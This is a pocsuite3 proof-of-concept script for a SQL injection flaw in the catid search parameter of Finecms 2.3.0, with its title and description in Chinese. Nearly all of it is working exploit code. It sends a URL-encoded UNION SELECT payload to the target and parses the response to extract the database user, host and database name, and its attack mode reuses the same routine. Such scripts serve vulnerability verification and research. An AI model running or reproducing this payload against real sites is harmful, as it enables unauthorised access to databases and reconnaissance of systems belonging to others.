Finecms 2.3.0 /search_model.php SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1281' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-05-17' createDate = '2014-05-19' updateDate = '2014-05-19' references = ['http://wooyun.org/bugs/wooyun-2014-059753'] name = 'Finecms 2.3.0 /search_model.php SQL注入漏洞 POC' appPowerLink = 'http://dayrui.com/' appName = 'Finecms' appVersion = 'v2.3.0#' vulType = 'SQL Injection' desc = ''' Finecms在进行关键词查询时，对catid字段没有做好过滤，导致SQLi ''' samples = [] install_requires = [''] def _verify(self): result = {} urli = self.url + '/book/index.php?c=search&catid=3' sql_get = "%20union%20all%20select%20concat_ws(0x3a3a,0x346B7765,user(),0x346B3761,database(),0x77653571)%23" content = requests.get(urli+sql_get).text u_h_p = re.findall('4kwe::(.*?)::4k7a::(.*?)::we5q', content) if u_h_p: (u_h, DBname) = u_h_p[0] index = u_h.rfind('@') (Username, Hostname) = (u_h[:index], u_h[index + 1:]) result['Database'] = {} result['Database']['Hostname'] = Hostname result['Database']['Username'] = Username result['Database']['DBname'] = DBname return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)